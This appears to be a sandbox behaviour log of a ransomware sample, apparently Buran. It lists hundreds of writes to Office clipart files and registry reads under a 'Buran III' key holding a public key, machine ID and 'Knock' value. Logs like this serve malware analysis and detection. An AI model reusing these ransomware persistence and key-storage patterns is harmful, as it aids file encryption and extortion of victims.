Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00388_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00390_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00391_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00394_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00395_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00417_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00433_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00438_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00452_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00454_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00458_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00487_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00494_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00512_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00523_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00530_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00641_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00784_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00806_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00807_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00932_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01123_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01141_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01148_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01149_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01152_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01154_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01158_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01164_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01293_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01354_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01356_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01357_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01358_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01361_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01368_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01421_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01468_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01470_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01472_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01474_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01627_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01680_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01682_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01701_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01848_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01866_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02009_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02041_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02066_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02091_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02092_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02093_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02124_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02125_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02127_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02262_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02264_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02368_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02371_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02373_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02384_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02386_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02388_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02389_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02390_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02398_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02407_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02423_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02424_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02426_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02435_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02439_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02441_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02443_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02444_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02448_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02450_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02451_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02453_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NBOOK_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OCEAN_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OUTDR_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PAPER_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_02.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_04.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_05.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_06.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_07.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_08.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_10.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00013_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00014_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00034_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00049_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00231_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00272_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00468_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00485_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00531_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00559_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00563_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00633_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00668_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00685_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00686_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00720_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00723_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00726_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00737_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00833_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00898_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00998_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01160_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01172_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01191_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01661_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01797_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02120_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02169_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02265_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02267_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02278_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02280_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02282_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02285_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02287_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02288_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02293_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02296_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02522_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02950_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02957_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03257_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03339_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03451_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03453_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03459_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03464_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03466_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03470_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03513_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03668_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03731_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03795_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE04050_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05665_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05710_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05869_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05870_.WMF size = 1 True 1
Fn
Data
For performance reasons, the remaining 3001 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (6194)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Borland\Locales - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Borland\Locales - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Borland\Delphi\Locales - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III\Service - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 737
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 3
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 76
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 381
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 16
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 552
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 20
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 303
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 151
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 187
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 323
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 224
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 85
Fn
Open Key HKEY_CURRENT_USER\Software\Buran III - True 25
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III\Service value_name = Public Key, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III\Service value_name = Public Key, data = 3xzYJ+y2NSmw1xLZFfqXhuF5kR6Tyk7ifM2IMf21mKAmd9FUIZxRRM9uZ8WMatN83zZgiDNyGXH8XLlIVXkhgS9kyLlQj+PUyNaSNs0RCIA7utad7O7p1l7BCCFo4IHpVe5T2HpPBsOhZbmuVgxZ9oZ+0A2LziNCZ2+TttReaL7jLhJzU5m/NV+ommU5fkNcPj7F351ilYGzTVokHcqcBMBtP1+YXDJ7wIrZt9rit1E1zHKPkHTgla3Z7s+AxlcgyU3Mlc9W9mIo4zYiN2byFdaKANJIfIvV50dmtS2FcZ7QgvBTviuoczgIANQxzqG2mc6bQyukV+q+nEhWHRgyFzXRdzVSL2b42JKlzz7+oGJRq5XPjtyJcqxBKSLO2FtzudAFiThOo6cL2XYBkzNg, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III\Service value_name = Machine ID, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III\Service value_name = Machine ID, data = xkf6VLCLiDdgyCVpw8u0Gt0be4BahDg10uriU0NSP2J4tAYz7Girojw8L38vPTmc0gxy1dUqBEIIEfl0MlyUXg9wvlg09maFu7FeRqJTF+/P43l2Fg8QcmgW6EdxjnB7wkYyBXz+NvmCD6+vn/X72B5HXZ3roCDM1FbK0RSU6gueoI0JbLp3YfhMJYMkUlR8y0+uMQoXgNgpYzWAf/5jy5zQEJbBlgRbC9pEfgNmnW4naIvEn6tczqcwekAagDEZmNPtcoUHgh7eLlngYkyeZ8U3gmuNctrWyRnfhbgDQ5yb6kIdJ2Pi3kYsXuwACi/IoTEINPA9X7dsJ5KtUBQpoSDvhwRM6Q4vtkfZz/Ikv2sLRpErxIwOulXxNu4bU6IEyLSFCG4NIRgPdBgHCX5lRFkPl8L5zgXhEHNr8qKrIcIIiNaGhX120R15vHbaMF1oJVGaVZ8fKHe4O5B6smW6VNlv3f3d6O5vGkhEiU9sl+MRXo0LclmkmMxeGRM+vY9TNJbFqNfzSz5W5iW2tBAJAvrxWiIy6Zlxvjr8TfKhkRSxWft2f1cWiY1RQGpdOidvHlaPetwBhaCnugDilR6DYOVavuRT1pWGFNzYCwqEBKGdutNr+qz1gYVn3a3zulX5rD1Ks8S3iKC0O8fTPoLXsblfEsMb815hMpDFTEEGEAHojZ5GljPpyepAFUqOXm+LiYuWoO3Hb0s4Rk8qE3Om6/upeM7I2jRn9/Emk/onyuYJXDz3Ai76lU7DR+ne9WYYHNYeezuWmWanwUBpSKabygJEzVYgKKU7yNphPCJ4w+VRjOnkRUKU2FjIwwMxaKMl+NtNgee/05w9MpwkYjiJtTeREmRCvuSexXiNtyXcKPnBnlf51m84mW6k3pKdzILWUeZfaxp4CPpHndggt5HAytUckmFJqWCdJVeQDH+Q9eCAARqae53A6ZlJYst+8f6ekivJGjtrGqfZyjKWeuDtH4oO4jEa5q0j3bAV1uE3ELzItR6aYrsaXyrgzAK22ewZwNlEOIMl8IsoQQ22zHYZDHqTgjVQXBZVzH/CaMyNciukoB2TDFHOHvYycwX13LMyxEweR7uC+Ea8O6ms5M14kRpBAoxWO6iSVc+2smCiSshToaktTwmO/ZmGlpKjXkbia6M6rk0YotUqkpIiLegd4VvVouZ4/U6kZ/kYLwY8+3nJMY9LW4LkIGPT6gapGXTx5GBsraAlPk2urWlvPqW58Dp0Q+3sQZZFkSCED3zvohptM9eZS0lBysl92wu9kfPmIIy3ztdpvjJRcuhVZaLwqtk8tJThW0jxItcnUi7epciw3crM3VoJKNR3J0jv6ZVZMMkrM6NKxdjwuTYUXykWsCz95OgRhKfq4wyQA8yP2pe8TrJzKlAhnUNpkNx5AUs5B8gE/9ocMSH7eH4/OB0OR0IsSX/WQbB2oVns0a0XQj27gEoBZXWEjrBHFB1WJTkXu04Ig3gV2I4+T7btHj5JBudkWzZxgwZOagU6AQKrIuTxg8NiHVmOC6PY1O25Yp4/yg5RhAkqCzDtcerKD/V6DkJFbmbW6X0k8IG2od7N1Y5ThCbF1O8Jr6gEtsSjNdxG4b4VtnYEFAoOBa92+OCNRYuXJxII5NedV5tWJNcC9YfsbHKFVdE/rCedL6QuOPwPx++NWOfEu67eLHpBhCMj0+Oo7QPrEsUqoIYqUapkCT01XGS4UhgjOgY1JhSKX1566l3kJQ==, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Knock, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Knock, data = 666, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
